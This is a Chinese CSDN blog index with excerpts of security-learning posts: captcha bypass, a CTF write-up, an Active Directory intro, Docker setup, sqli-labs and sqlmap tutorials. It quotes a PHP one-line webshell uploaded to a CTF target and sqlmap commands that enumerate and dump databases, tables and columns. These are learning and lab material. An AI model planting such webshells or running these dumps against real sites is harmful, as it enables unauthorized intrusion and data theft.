0hma-CSDN博客

原创暴力破解学习-验证码的爆破与绕过

【验证码机制原理】客户端发起请求>服务端响应并创建一个新的SessionID同时生成随机验证码，将验证码和SessionID一并返回给客户端>客户端提交验证码连同SessionID给服务端>服务端验证验证码同时销毁当前会话，返回给客户端结果【可能存在的安全问题】客户端（on client）：有的网站验证码由本地js生成仅仅在本地用js验证。可以在本地禁用js，用burp把验证字段删除。有的网站把验证码输出到客户端html中，送到客户端Cookie或response head

2020-12-14 21:49:17 2392

原创 BuuCTF做题记录-[BJDCTF 2nd]假猪套天下第一

夹竹桃天下第一！！！尝试输入admin登入，登陆失败随便输入一个账号登录，登陆成功重新返回登录界面提交表单,使用Burp抓包

2020-11-24 14:00:00 342 1

原创域的简单介绍

1.域的简单介绍将网络中多台计算机逻辑上组织到一起进行集中管理，这种区别于工作组的逻辑环境叫做域。域是由域控制器(Domain Controller)和成员计算机组成，域控制器就是安装了活动目录(Active Directory)的计算机。活动目录提供了存储网络上对象信息并使用网络使用该数据的方法。2.域的优缺点工作组的缺点没有统一的管理机制，没有对用户账户的统一的身份验证机制  没有统一查找网络资源的机制域的优势活动目录的特点:集中管理，可以集中的管理企业中成千上万分布于异地

2020-11-09 11:35:54 952

原创 CentOS7下安装Docker容器+镜像加速器+Docker-Compose

DockerDocker 是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中，然后发布到任何流行的Linux或Windows 机器上，也可以实现虚拟化。容器是完全使用沙箱机制，相互之间不会有任何接口。Docker的安装安装命令如下：curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun也可以使用国内 daocloud 一键安装命令：curl -sSL https://get.dao

2020-10-16 23:44:07 167

原创 Web安全-用一句话木马拿下RDCTF靶机实战1

一句话木马一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。本次使用的php一句话：<?php @eval($_POST['1']) ?>用这段代码保存为一个php后门木马上传木马本次使用的是RDCTF平台的靶机实战进入管理员后台界面找到附件管理，发现了这里可以上传文件将写好的一句话木马上传回到首页，找到文件上传的网页找到一句话木马文件使用蚁剑连接拿到flag...

2020-09-15 18:28:21 611

原创 SQL注入学习-搭建sqli-labs

sqli-labssqli-labs是一个非常好的学习sql注入的平台。0X01 sqli-labs下载sqli-labs下载地址：https://github.com/Audi-1/sqli-labs0X02 sqli-labs安装安装一个集成环境，本次使用宝塔面板的WAMP环境先添加一个站点注意要新建一个MySQL数据库创建一个数据库上传sqli-labs压缩包到根目录解压得到文件夹修改www\sqli-labs-master\sql-connections，这个目录下的

2020-09-12 00:31:48 1014 2

原创 SQL注入学习-sqlmap的安装

sqlmap的安装sqlmap 官网：http://sqlmap.org/sqlmap文档地址：https://github.com/sqlmapproject/sqlmap/wiki/Usagesqlmap用户手册详解实用版：http://www.vuln.cn/20351.获取sqlmap压缩包2.在python文件夹中新建一个sqlmap文件夹，将压缩包解压后将其添加进入环境变量3.打开命令行窗口输入sqlmap.py运行...

2020-09-11 22:59:20 65

原创 SQL注入学习-RDCTF靶机实战1

sqlmap的安装1.获取sqlmap压缩包2.解压后将其添加进入环境变量3.打开命令行窗口输入sqlmap.py运行sqlmap的使用本次使用的命令sqlmap.py -u {URL} //查看是否有注入点sqlmap.py -u {URL} -dbs //爆数据库sqlmap.py -u {URL} -D db --tables //爆数据表sqlmap.py -u {URL} -D db -T table --columns //爆字段sqlmap.py -u {URL} -D

2020-09-10 18:26:48 313

原创 Web安全基础-网络安全行业入门的各项介绍

一、黑客和白客的区别黑客和白客主要的区别就是面对漏洞的处理方式不同：黑客往往会利用漏洞进行一些不正当的牟利的操作，会对他人造成一定的危害；而白帽子会把发现的漏洞提交给网站管理员或者应急响应平台，并以获得平台的奖励作为收入来源之一。例如当一个购物网站产生漏洞时，黑客往往想着怎么样通过这个漏洞装满自己的钱包，而白客则会将漏洞进行修复而减少商家的损失感受：技术是一把双刃剑，职业的性质取决与自己利用漏洞时的处理应对的方法和行为。能力越大，责任越大。什么是Web应用?能通过Web访问的各类网站就叫做Web

2020-09-07 18:29:50 1321 1

qq_46231152的博客